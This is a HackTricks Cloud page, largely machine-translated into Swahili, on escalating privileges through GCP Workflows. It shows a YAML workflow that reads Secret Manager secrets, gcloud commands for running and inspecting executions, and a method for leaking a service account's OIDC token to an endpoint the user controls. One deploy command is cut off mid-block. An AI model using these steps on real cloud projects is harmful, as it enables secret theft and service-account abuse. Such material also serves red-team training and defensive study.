HackTricks CloudGCP - Workflows Privesc
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Workflows
Taarifa za Msingi:
workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)
Kama ninavyojua, haiwezekani kupata shell yenye ufikiaji wa metadata endpoint inayojumuisha credentials za SA ya SA iliyounganishwa na Workflow. Hata hivyo, inawezekana kutuma matumizi mabaya ya ruhusa za SA kwa kuongeza vitendo vya kutekeleza ndani ya Workflow.
Inawezekana kupata dokumenteshini ya connectors. Kwa mfano, hii ni the page of the Secretmanager connector. Katika sidebar unaweza kupata connectors nyingine kadhaa.
Na hapa unaweza kupata mfano wa connector inayochapisha siri:
Usanidi wa Workflow YAML kufikia secrets
```yaml main: params: [input] steps: - access_string_secret: call: googleapis.secretmanager.v1.projects.secrets.versions.accessString args: secret_id: secret_name version: 1 project_id: project-id result: str_secret - returnOutput: return: "${str_secret}" ```Sasisho kutoka kwa CLI:
Weka na endesha workflows kutoka kwa CLI
```bash gcloud workflows deployIkiwa huna ufikiaji wa wavuti, inawezekana kuanzisha na kuona utekelezaji wa Workflow kwa kutumia:
# Run execution with output
gcloud workflows run <workflow-name> --location us-central1
# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1
# List executions
gcloud workflows executions list <workflow-name>
# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
Caution
Unaweza pia kuangalia matokeo ya utekelezaji uliopita kutafuta taarifa nyeti
Kumbuka kwamba hata ukipata kosa kama PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... kwa sababu huna ruhusa hiyo, workflow imeundwa.
Leak OIDC token (and OAuth?)
Kwa mujibu wa to the docs inawezekana kutumia hatua za workflow ambazo zitatuma ombi la HTTP lenye OAuth au OIDC token. Hata hivyo, kama ilivyo katika kesi ya Cloud Scheduler, ombi la HTTP lenye Oauth token lazima liwe kwa mwenyeji .googleapis.com.
Caution
Hivyo, ni inawezekana ku-leak OIDC token kwa kuonyesha HTTP endpoint inayodhibitiwa na mtumiaji, lakini ili ku-leak token ya OAuth utahitaji bypass kwa ulinzi huo. Hata hivyo, bado unaweza kuwasiliana na api yoyote ya GCP kufanya vitendo kwa niaba ya SA kwa kutumia connectors au maombi ya HTTP zenye OAuth token.
Oauth
Workflow HTTP request with OAuth token
```yaml - step_A: call: http.post args: url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop auth: type: OAuth2 scopes: OAUTH_SCOPE ```Ombi la HTTP la Workflow na OIDC token
```yaml - step_A: call: http.get args: url: https://us-central1-project.cloudfunctions.net/functionA query: firstNumber: 4 secondNumber: 6 operation: sum auth: type: OIDC audience: OIDC_AUDIENCE ```Kwa ruhusa hii, badala ya workflows.workflows.create, inawezekana kusasisha workflow iliyopo tayari na kutekeleza mashambulizi yale yale.
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.